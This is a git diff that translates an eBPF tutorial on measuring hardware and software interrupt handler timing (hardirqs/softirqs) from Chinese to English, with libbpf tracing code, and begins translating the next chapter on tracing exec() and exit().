software interrupt handlers. They are a low-level asynchronous event handling mechanism in the kernel, used for handling high-priority tasks in the kernel. softirqs are commonly used to handle events in the network protocol stack, disk subsystem, and other kernel components. Compared to hardware interrupt handlers, software interrupt handlers have more flexibility and configurability. -## 实现原理 +## Implementation Details -在 eBPF 中,我们可以通过挂载特定的 kprobe 或者 tracepoint 来捕获和分析 hardirqs 和 softirqs。为了捕获 hardirqs 和 softirqs,需要在相关的内核函数上放置 eBPF 程序。这些函数包括: +In eBPF, we can capture and analyze hardirqs and softirqs by attaching specific kprobes or tracepoints. To capture hardirqs and softirqs, eBPF programs need to be placed on relevant kernel functions. These functions include: -- 对于 hardirqs:irq_handler_entry 和 irq_handler_exit。 -- 对于 softirqs:softirq_entry 和 softirq_exit。 +- For hardirqs: irq_handler_entry and irq_handler_exit. +- For softirqs: softirq_entry and softirq_exit. -当内核处理 hardirqs 或 softirqs 时,这些 eBPF 程序会被执行,从而收集相关信息,如中断向量、中断处理程序的执行时间等。收集到的信息可以用于分析内核中的性能问题和其他与中断处理相关的问题。 +When the kernel processes hardirqs or softirqs, these eBPF programs are executed to collect relevant information such as interrupt vectors, execution time of interrupt handlers, etc. The collected information can be used for analyzing performance issues and other interrupt handling related problems in the kernel. -为了捕获 hardirqs 和 softirqs,可以遵循以下步骤: +To capture hardirqs and softirqs, the following steps can be followed: -1. 在 eBPF 程序中定义用于存储中断信息的数据结构和映射。 -2. 
编写 eBPF 程序,将其挂载到相应的内核函数上,以捕获 hardirqs 或 softirqs。
-3. 在 eBPF 程序中,收集中断处理程序的相关信息,并将这些信息存储在映射中。
-4. 在用户空间应用程序中,读取映射中的数据以分析和展示中断处理信息。
+1. Define data structures and maps in eBPF programs for storing interrupt information.
+2. Write eBPF programs and attach them to the corresponding kernel functions to capture hardirqs or softirqs.
+3. In eBPF programs, collect relevant information about interrupt handlers and store this information in the maps.
+4. In user space applications, read the data from the maps to analyze and display the interrupt handling information.

-通过上述方法,我们可以在 eBPF 中使用 hardirqs 和 softirqs 捕获和分析内核中的中断事件,以识别潜在的性能问题和与中断处理相关的问题。
+By following the above approach, we can use hardirqs and softirqs in eBPF to capture and analyze interrupt events in the kernel, identifying potential performance issues and interrupt handling related problems.

-## hardirqs 代码实现
+## Implementation of the hardirqs Code

-hardirqs 程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。
+The main purpose of the hardirqs program is to obtain the name, execution count, and execution time of interrupt handlers and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step.

```c
// SPDX-License-Identifier: GPL-2.0
@@ -166,11 +166,11 @@ int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action)
 char LICENSE[] SEC("license") = "GPL";
```

-这段代码是一个 eBPF 程序,用于捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。
+This code is an eBPF program used to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel. The main purpose of the program is to obtain the name, execution count, and execution time of the interrupt handler, and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step.

-1. 包含必要的头文件和定义数据结构:
+1. Include necessary header files and define data structures:

- ```c
+```c
 #include <vmlinux.h>
 #include <bpf/bpf_core_read.h>
 #include <bpf/bpf_helpers.h>
@@ -178,14 +178,13 @@ char LICENSE[] SEC("license") = "GPL";
 #include "hardirqs.h"
 #include "bits.bpf.h"
 #include "maps.bpf.h"
- ```
+```

- 该程序包含了 eBPF 开发所需的标准头文件,以及用于定义数据结构和映射的自定义头文件。
+This program includes the standard header files required for eBPF development, as well as custom header files for defining data structures and maps.

-2. 定义全局变量和映射:
-
- ```c
+2. Define global variables and maps:
+```c
 #define MAX_ENTRIES 256

 const volatile bool filter_cg = false;
@@ -194,18 +193,17 @@ char LICENSE[] SEC("license") = "GPL";
 const volatile bool do_count = false;

 ...
- ```
+```

- 该程序定义了一些全局变量,用于配置程序的行为。例如,`filter_cg` 控制是否过滤 cgroup,`targ_dist` 控制是否显示执行时间的分布等。此外,程序还定义了三个映射,分别用于存储 cgroup 信息、开始时间戳和中断处理程序的信息。
+This program defines some global variables that are used to configure the behavior of the program. For example, `filter_cg` controls whether to filter cgroups, `targ_dist` controls whether to display the distribution of execution time, etc. Additionally, the program defines three maps for storing cgroup information, start timestamps, and interrupt handler information.

-3. 定义两个辅助函数 `handle_entry` 和 `handle_exit`:

- 这两个函数分别在中断处理程序的入口和出口处被调用。`handle_entry` 记录开始时间戳或更新中断计数,`handle_exit` 计算中断处理程序的执行时间,并将结果存储到相应的信息映射中。

+3. Define two helper functions `handle_entry` and `handle_exit`:

+These two functions are called at the entry and exit points of the interrupt handler.
`handle_entry` records the start timestamp or updates the interrupt count, while `handle_exit` calculates the execution time of the interrupt handler and stores the result in the corresponding information map. -4. 定义 eBPF 程序的入口点: - - ```c +4. Define the entry points of the eBPF program: +```c SEC("tp_btf/irq_handler_entry") int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) { @@ -229,17 +227,17 @@ char LICENSE[] SEC("license") = "GPL"; { return handle_exit(irq, action); } - ``` +``` - 这里定义了四个 eBPF 程序入口点,分别用于捕获中断处理程序的入口和出口事件。`tp_btf` 和 `raw_tp` 分别代表使用 BPF Type Format(BTF)和原始 tracepoints 捕获事件。这样可以确保程序在不同内核版本上可以移植和运行。 +Here, four entry points of the eBPF program are defined, which are used to capture the entry and exit events of the interrupt handler. `tp_btf` and `raw_tp` represent capturing events using BPF Type Format (BTF) and raw tracepoints, respectively. This ensures that the program can be ported and run on different kernel versions. -Softirq 代码也类似,这里就不再赘述了。 +The code for softirqs is similar, so we won't repeat it here. -## 运行代码 +## Running the Code -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain built around Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. -要编译这个程序,请使用 ecc 工具: +To compile this program, use the ecc tool: ```console $ ecc hardirqs.bpf.c @@ -247,16 +245,18 @@ Compiling bpf object... Packing ebpf object and config into package.json... ``` -然后运行: +Then run: ```console sudo ecli run ./package.json ``` -## 总结 +## Summary -在本章节(eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件)中,我们学习了如何使用 eBPF 程序捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。我们详细讲解了示例代码,包括如何定义数据结构、映射以及 eBPF 程序入口点,以及如何在中断处理程序的入口和出口处调用辅助函数来记录执行信息。 +In this chapter (eBPF Tutorial by Example 10: Capturing Interrupts with hardirqs or softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. We explained the example code in detail, including how to define data structures, maps, and eBPF program entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers. -通过学习本章节内容,您应该已经掌握了如何在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件的方法,以及如何分析这些事件以识别内核中的性能问题和其他与中断处理相关的问题。这些技能对于分析和优化 Linux 内核的性能至关重要。 +By studying this chapter, you should have mastered how to capture interrupt events with hardirqs or softirqs in eBPF, as well as how to analyze these events to identify performance issues and other problems related to interrupt handling in the kernel. These skills are crucial for analyzing and optimizing the performance of the Linux kernel. -为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 +To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at .
+ +> The original link of this article: diff --git a/src/10-hardirqs/README.zh.md b/src/10-hardirqs/README.zh.md new file mode 100644 index 0000000..33e8173 --- /dev/null +++ b/src/10-hardirqs/README.zh.md @@ -0,0 +1,262 @@ +# eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第十篇,在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件。 +hardirqs 和 softirqs 是 Linux 内核中两种不同类型的中断处理程序。它们用于处理硬件设备产生的中断请求,以及内核中的异步事件。在 eBPF 中,我们可以使用同名的 eBPF 工具 hardirqs 和 softirqs 来捕获和分析内核中与中断处理相关的信息。 + +## hardirqs 和 softirqs 是什么? + +hardirqs 是硬件中断处理程序。当硬件设备产生一个中断请求时,内核会将该请求映射到一个特定的中断向量,然后执行与之关联的硬件中断处理程序。硬件中断处理程序通常用于处理设备驱动程序中的事件,例如设备数据传输完成或设备错误。 + +softirqs 是软件中断处理程序。它们是内核中的一种底层异步事件处理机制,用于处理内核中的高优先级任务。softirqs 通常用于处理网络协议栈、磁盘子系统和其他内核组件中的事件。与硬件中断处理程序相比,软件中断处理程序具有更高的灵活性和可配置性。 + +## 实现原理 + +在 eBPF 中,我们可以通过挂载特定的 kprobe 或者 tracepoint 来捕获和分析 hardirqs 和 softirqs。为了捕获 hardirqs 和 softirqs,需要在相关的内核函数上放置 eBPF 程序。这些函数包括: + +- 对于 hardirqs:irq_handler_entry 和 irq_handler_exit。 +- 对于 softirqs:softirq_entry 和 softirq_exit。 + +当内核处理 hardirqs 或 softirqs 时,这些 eBPF 程序会被执行,从而收集相关信息,如中断向量、中断处理程序的执行时间等。收集到的信息可以用于分析内核中的性能问题和其他与中断处理相关的问题。 + +为了捕获 hardirqs 和 softirqs,可以遵循以下步骤: + +1. 在 eBPF 程序中定义用于存储中断信息的数据结构和映射。 +2. 编写 eBPF 程序,将其挂载到相应的内核函数上,以捕获 hardirqs 或 softirqs。 +3. 在 eBPF 程序中,收集中断处理程序的相关信息,并将这些信息存储在映射中。 +4. 在用户空间应用程序中,读取映射中的数据以分析和展示中断处理信息。 + +通过上述方法,我们可以在 eBPF 中使用 hardirqs 和 softirqs 捕获和分析内核中的中断事件,以识别潜在的性能问题和与中断处理相关的问题。 + +## hardirqs 代码实现 + +hardirqs 程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。 + +```c +// SPDX-License-Identifier: GPL-2.0 +// Copyright (c) 2020 Wenbo Zhang +#include +#include +#include +#include +#include "hardirqs.h" +#include "bits.bpf.h" +#include "maps.bpf.h" + +#define MAX_ENTRIES 256 + +const volatile bool filter_cg = false; +const volatile bool targ_dist = false; +const volatile bool targ_ns = false; +const volatile bool do_count = false; + +struct { + __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); + __type(key, u32); + __type(value, u32); + __uint(max_entries, 1); +} cgroup_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); + __uint(max_entries, 1); + __type(key, u32); + __type(value, u64); +} start SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, struct irq_key); + __type(value, struct info); +} infos SEC(".maps"); + +static struct info zero; + +static int handle_entry(int irq, struct irqaction *action) +{ + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + if (do_count) { + struct irq_key key = {}; + struct info *info; + + bpf_probe_read_kernel_str(&key.name, sizeof(key.name), BPF_CORE_READ(action, name)); + info = bpf_map_lookup_or_try_init(&infos, &key, &zero); + if (!info) + return 0; + info->count += 1; + return 0; + } else { + u64 ts = bpf_ktime_get_ns(); + u32 key = 0; + + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + bpf_map_update_elem(&start, &key, &ts, BPF_ANY); + return 0; + } +} + +static int handle_exit(int irq, struct irqaction *action) +{ + struct irq_key ikey = {}; + struct info *info; + u32 key = 0; + u64 delta; + u64 *tsp; + + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + tsp = bpf_map_lookup_elem(&start, &key); + if (!tsp) + return 0; + + delta = bpf_ktime_get_ns() - *tsp; + if (!targ_ns) + delta /= 1000U; + + bpf_probe_read_kernel_str(&ikey.name, sizeof(ikey.name), BPF_CORE_READ(action, 
name)); + info = bpf_map_lookup_or_try_init(&infos, &ikey, &zero); + if (!info) + return 0; + + if (!targ_dist) { + info->count += delta; + } else { + u64 slot; + + slot = log2(delta); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + info->slots[slot]++; + } + + return 0; +} + +SEC("tp_btf/irq_handler_entry") +int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) +{ + return handle_entry(irq, action); +} + +SEC("tp_btf/irq_handler_exit") +int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) +{ + return handle_exit(irq, action); +} + +SEC("raw_tp/irq_handler_entry") +int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) +{ + return handle_entry(irq, action); +} + +SEC("raw_tp/irq_handler_exit") +int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) +{ + return handle_exit(irq, action); +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这段代码是一个 eBPF 程序,用于捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。 + +1. 包含必要的头文件和定义数据结构: + + ```c + #include + #include + #include + #include + #include "hardirqs.h" + #include "bits.bpf.h" + #include "maps.bpf.h" + ``` + + 该程序包含了 eBPF 开发所需的标准头文件,以及用于定义数据结构和映射的自定义头文件。 + +2. 定义全局变量和映射: + + ```c + + #define MAX_ENTRIES 256 + + const volatile bool filter_cg = false; + const volatile bool targ_dist = false; + const volatile bool targ_ns = false; + const volatile bool do_count = false; + + ... + ``` + + 该程序定义了一些全局变量,用于配置程序的行为。例如,`filter_cg` 控制是否过滤 cgroup,`targ_dist` 控制是否显示执行时间的分布等。此外,程序还定义了三个映射,分别用于存储 cgroup 信息、开始时间戳和中断处理程序的信息。 + +3. 定义两个辅助函数 `handle_entry` 和 `handle_exit`: + + 这两个函数分别在中断处理程序的入口和出口处被调用。`handle_entry` 记录开始时间戳或更新中断计数,`handle_exit` 计算中断处理程序的执行时间,并将结果存储到相应的信息映射中。 + +4. 定义 eBPF 程序的入口点: + + ```c + + SEC("tp_btf/irq_handler_entry") + int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) + { + return handle_entry(irq, action); + } + + SEC("tp_btf/irq_handler_exit") + int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) + { + return handle_exit(irq, action); + } + + SEC("raw_tp/irq_handler_entry") + int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) + { + return handle_entry(irq, action); + } + + SEC("raw_tp/irq_handler_exit") + int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) + { + return handle_exit(irq, action); + } + ``` + + 这里定义了四个 eBPF 程序入口点,分别用于捕获中断处理程序的入口和出口事件。`tp_btf` 和 `raw_tp` 分别代表使用 BPF Type Format(BTF)和原始 tracepoints 捕获事件。这样可以确保程序在不同内核版本上可以移植和运行。 + +Softirq 代码也类似,这里就不再赘述了。 + +## 运行代码 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +要编译这个程序,请使用 ecc 工具: + +```console +$ ecc hardirqs.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... 
+``` + +然后运行: + +```console +sudo ecli run ./package.json +``` + +## 总结 + +在本章节(eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件)中,我们学习了如何使用 eBPF 程序捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。我们详细讲解了示例代码,包括如何定义数据结构、映射以及 eBPF 程序入口点,以及如何在中断处理程序的入口和出口处调用辅助函数来记录执行信息。 + +通过学习本章节内容,您应该已经掌握了如何在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件的方法,以及如何分析这些事件以识别内核中的性能问题和其他与中断处理相关的问题。这些技能对于分析和优化 Linux 内核的性能至关重要。 + +为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 diff --git a/src/10-hardirqs/README_en.md b/src/10-hardirqs/README_en.md deleted file mode 100644 index 4de28a9..0000000 --- a/src/10-hardirqs/README_en.md +++ /dev/null @@ -1,262 +0,0 @@ -# eBPF Tutorial by Example 10: Capturing Interrupts with hardirqs or softirqs - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. - -This article is the tenth part of the eBPF Tutorial by Example, focusing on capturing interrupt events using hardirqs or softirqs in eBPF. -hardirqs and softirqs are two different types of interrupt handlers in the Linux kernel. They are used to handle interrupt requests generated by hardware devices, as well as asynchronous events in the kernel. In eBPF, we can use the eBPF tools hardirqs and softirqs to capture and analyze information related to interrupt handling in the kernel. - -## What are hardirqs and softirqs? - -hardirqs are hardware interrupt handlers. When a hardware device generates an interrupt request, the kernel maps it to a specific interrupt vector and executes the associated hardware interrupt handler. Hardware interrupt handlers are commonly used to handle events in device drivers, such as completion of device data transfer or device errors. - -softirqs are software interrupt handlers. They are a low-level asynchronous event handling mechanism in the kernel, used for handling high-priority tasks in the kernel. softirqs are commonly used to handle events in the network protocol stack, disk subsystem, and other kernel components. Compared to hardware interrupt handlers, software interrupt handlers have more flexibility and configurability. - -## Implementation Details - -In eBPF, we can capture and analyze hardirqs and softirqs by attaching specific kprobes or tracepoints. To capture hardirqs and softirqs, eBPF programs need to be placed on relevant kernel functions. These functions include: - -- For hardirqs: irq_handler_entry and irq_handler_exit. -- For softirqs: softirq_entry and softirq_exit. - -When the kernel processes hardirqs or softirqs, these eBPF programs are executed to collect relevant information such as interrupt vectors, execution time of interrupt handlers, etc. The collected information can be used for analyzing performance issues and other interrupt handling related problems in the kernel. - -To capture hardirqs and softirqs, the following steps can be followed: - -1. Define data structures and maps in eBPF programs for storing interrupt information. -2. Write eBPF programs and attach them to the corresponding kernel functions to capture hardirqs or softirqs. -3. In eBPF programs, collect relevant information about interrupt handlers and store this information in the maps. -4. In user space applications, read the data from the maps to analyze and display the interrupt handling information. 
- -By following the above approach, we can use hardirqs and softirqs in eBPF to capture and analyze interrupt events in the kernel, identifying potential performance issues and interrupt handling related problems. - -## Implementation of hardirqs Code - -The main purpose of the hardirqs program is to obtain the name, execution count, and execution time of interrupt handlers and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step. - -```c -// SPDX-License-Identifier: GPL-2.0 -// Copyright (c) 2020 Wenbo Zhang -#include -#include -#include -#include -#include "hardirqs.h" -#include "bits.bpf.h" -#include "maps.bpf.h" - -#define MAX_ENTRIES 256 - -const volatile bool filter_cg = false; -const volatile bool targ_dist = false; -const volatile bool targ_ns = false; -const volatile bool do_count = false; - -struct { - __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); - __type(key, u32); - __type(value, u32); - __uint(max_entries, 1); -} cgroup_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); - __uint(max_entries, 1); - __type(key, u32); - __type(value, u64); -} start SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, struct irq_key); - __type(value, struct info); -} infos SEC(".maps"); - -static struct info zero; - -static int handle_entry(int irq, struct irqaction *action) -{ - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - if (do_count) { - struct irq_key key = {}; - struct info *info; - - bpf_probe_read_kernel_str(&key.name, sizeof(key.name), BPF_CORE_READ(action, name)); - info = bpf_map_lookup_or_try_init(&infos, &key, &zero); - if (!info) - return 0; - info->count += 1; - return 0; - } else { - u64 ts = bpf_ktime_get_ns(); - u32 key = 0; - - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - bpf_map_update_elem(&start, &key, &ts, BPF_ANY); - return 0; - } -} - -static int handle_exit(int irq, struct irqaction *action) -{ - struct irq_key ikey = {}; - struct info *info; - u32 key = 0; - u64 delta; - u64 *tsp; - - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - tsp = bpf_map_lookup_elem(&start, &key); - if (!tsp) - return 0; - - delta = bpf_ktime_get_ns() - *tsp; - if (!targ_ns) - delta /= 1000U; - - bpf_probe_read_kernel_str(&ikey.name, sizeof(ikey.name), BPF_CORE_READ(action, name)); - info = bpf_map_lookup_or_try_init(&infos, &ikey, &zero); - if (!info) - return 0; - - if (!targ_dist) { - info->count += delta; - } else { - u64 slot; - - slot = log2(delta); - if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; - info->slots[slot]++; - } - - return 0; -} - -SEC("tp_btf/irq_handler_entry") -int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) -{ - return handle_entry(irq, action); -} - -SEC("tp_btf/irq_handler_exit") -int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) -{ - return handle_exit(irq, action); -} - -SEC("raw_tp/irq_handler_entry") -int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) -{ - return handle_entry(irq, action); -} - -SEC("raw_tp/irq_handler_exit") -int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) -{ - return handle_exit(irq, action); -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -This code is an eBPF program used to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel. 
The main purpose of the program is to obtain the name, execution count, and execution time of the interrupt handler, and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step. - -1. Include necessary header files and define data structures: - -```c - #include - #include - #include - #include - #include "hardirqs.h" - #include "bits.bpf.h" - #include "maps.bpf.h" -``` - -This program includes the standard header files required for eBPF development, as well as custom header files for defining data structures and maps. - -2. Define global variables and maps: - -```c - #define MAX_ENTRIES 256 - - const volatile bool filter_cg = false; - const volatile bool targ_dist = false; - const volatile bool targ_ns = false; - const volatile bool do_count = false; - - ... -``` - -This program defines some global variables that are used to configure the behavior of the program. For example, `filter_cg` controls whether to filter cgroups, `targ_dist` controls whether to display the distribution of execution time, etc. Additionally, the program defines three maps for storing cgroup information, start timestamps, and interrupt handler information. - -3. Define two helper functions `handle_entry` and `handle_exit`: - -These two functions are called at the entry and exit points of the interrupt handler. `handle_entry` records the start timestamp or updates the interrupt count, while `handle_exit` calculates the execution time of the interrupt handler and stores the result in the corresponding information map. - -4. Define the entry points of the eBPF program: - -```c - SEC("tp_btf/irq_handler_entry") - int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) - { - return handle_entry(irq, action); - } - - SEC("tp_btf/irq_handler_exit") - int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) - { - return handle_exit(irq, action); - } - - SEC("raw_tp/irq_handler_entry") - int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) - { - return handle_entry(irq, action); - } - - SEC("raw_tp/irq_handler_exit") - int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) - { - return handle_exit(irq, action); - } -``` - -Here, four entry points of the eBPF program are defined, which are used to capture the entry and exit events of the interrupt handler. `tp_btf` and `raw_tp` represent capturing events using BPF Type Format (BTF) and raw tracepoints, respectively. This ensures that the program can be ported and run on different kernel versions. - -The code for Softirq is similar, and I won't elaborate on it here. - -## Run code.Translated content - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -To compile this program, use the ecc tool: - -```console -$ ecc hardirqs.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -Then run: - -```console -sudo ecli run ./package.json -``` - -## Summary - -In this chapter (eBPF Tutorial by Example Ten: Capturing Interrupt Events in eBPF with Hardirqs or Softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. 
We explained the example code in detail, including how to define data structures, mappings, eBPF program entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers. - -By studying the content of this chapter, you should have mastered the methods of capturing interrupt events with hardirqs or softirqs in eBPF, as well as how to analyze these events to identify performance issues and other problems related to interrupt handling in the kernel. These skills are crucial for analyzing and optimizing the performance of the Linux kernel. - -To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at . - -> The original link of this article: diff --git a/src/11-bootstrap/README.md b/src/11-bootstrap/README.md index 48ea26f..0970a50 100644 --- a/src/11-bootstrap/README.md +++ b/src/11-bootstrap/README.md @@ -1,41 +1,41 @@ -# eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用 +# eBPF Tutorial by Example 11: Develop User-Space Programs with libbpf and Trace exec() and exit() -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code during kernel runtime. -在本教程中,我们将了解内核态和用户态的 eBPF 程序是如何协同工作的。我们还将学习如何使用原生的 libbpf 开发用户态程序,将 eBPF 应用打包为可执行文件,实现跨内核版本分发。 +In this tutorial, we will learn how kernel-space and user-space eBPF programs work together. We will also learn how to use the native libbpf to develop user-space programs, package eBPF applications into executable files, and distribute them across different kernel versions. -## libbpf 库,以及为什么需要使用它 +## The libbpf Library and Why We Need to Use It -libbpf 是一个 C 语言库,伴随内核版本分发,用于辅助 eBPF 程序的加载和运行。它提供了用于与 eBPF 系统交互的一组 C API,使开发者能够更轻松地编写用户态程序来加载和管理 eBPF 程序。这些用户态程序通常用于分析、监控或优化系统性能。 +libbpf is a C language library that is distributed with the kernel version to assist in loading and running eBPF programs. It provides a set of C APIs for interacting with the eBPF system, allowing developers to write user-space programs more easily to load and manage eBPF programs. These user-space programs are typically used for system performance analysis, monitoring, or optimization. -使用 libbpf 库有以下优势: +There are several advantages to using the libbpf library: -- 它简化了 eBPF 程序的加载、更新和运行过程。 -- 它提供了一组易于使用的 API,使开发者能够专注于编写核心逻辑,而不是处理底层细节。 -- 它能够确保与内核中的 eBPF 子系统的兼容性,降低了维护成本。 +- It simplifies the process of loading, updating, and running eBPF programs. +- It provides a set of easy-to-use APIs, allowing developers to focus on writing core logic instead of dealing with low-level details. +- It ensures compatibility with the eBPF subsystem in the kernel, reducing maintenance costs. -同时,libbpf 和 BTF(BPF Type Format)都是 eBPF 生态系统的重要组成部分。它们各自在实现跨内核版本兼容方面发挥着关键作用。BTF(BPF Type Format)是一种元数据格式,用于描述 eBPF 程序中的类型信息。BTF 的主要目的是提供一种结构化的方式,以描述内核中的数据结构,以便 eBPF 程序可以更轻松地访问和操作它们。 +At the same time, libbpf and BTF (BPF Type Format) are important components of the eBPF ecosystem. They play critical roles in achieving compatibility across different kernel versions. BTF is a metadata format used to describe type information in eBPF programs. 
The primary purpose of BTF is to provide a structured way to describe data structures in the kernel so that eBPF programs can access and manipulate them more easily. -BTF 在实现跨内核版本兼容方面的关键作用如下: +The key roles of BTF in achieving compatibility across different kernel versions are as follows: -- BTF 允许 eBPF 程序访问内核数据结构的详细类型信息,而无需对特定内核版本进行硬编码。这使得 eBPF 程序可以适应不同版本的内核,从而实现跨内核版本兼容。 -- 通过使用 BPF CO-RE(Compile Once, Run Everywhere)技术,eBPF 程序可以利用 BTF 在编译时解析内核数据结构的类型信息,进而生成可以在不同内核版本上运行的 eBPF 程序。 +- BTF allows eBPF programs to access detailed type information of kernel data structures without hardcoding specific kernel versions. This enables eBPF programs to adapt to different kernel versions, achieving compatibility across kernel versions. +- By using BPF CO-RE (Compile Once, Run Everywhere) technology, eBPF programs can leverage BTF to parse the type information of kernel data structures during compilation, thereby generating eBPF programs that can run on different kernel versions. -结合 libbpf 和 BTF,eBPF 程序可以在各种不同版本的内核上运行,而无需为每个内核版本单独编译。这极大地提高了 eBPF 生态系统的可移植性和兼容性,降低了开发和维护的难度。 +By combining libbpf and BTF, eBPF programs can run on various kernel versions without the need for separate compilation for each kernel version. This greatly improves the portability and compatibility of the eBPF ecosystem and reduces the difficulty of development and maintenance. -## 什么是 bootstrap +## What is Bootstrap -Bootstrap 是一个使用 libbpf 的完整应用,它利用 eBPF 程序来跟踪内核中的 exec() 系统调用(通过 SEC("tp/sched/sched_process_exec") handle_exec BPF 程序),这主要对应于新进程的创建(不包括 fork() 部分)。此外,它还跟踪进程的 exit() 系统调用(通过 SEC("tp/sched/sched_process_exit") handle_exit BPF 程序),以了解每个进程何时退出。 +Bootstrap is a complete application that utilizes libbpf. It uses eBPF programs to trace the exec() system call in the kernel (handled by the SEC("tp/sched/sched_process_exec") handle_exec BPF program), which mainly corresponds to the creation of new processes (excluding the fork() part). In addition, it also traces the exit() system call of processes 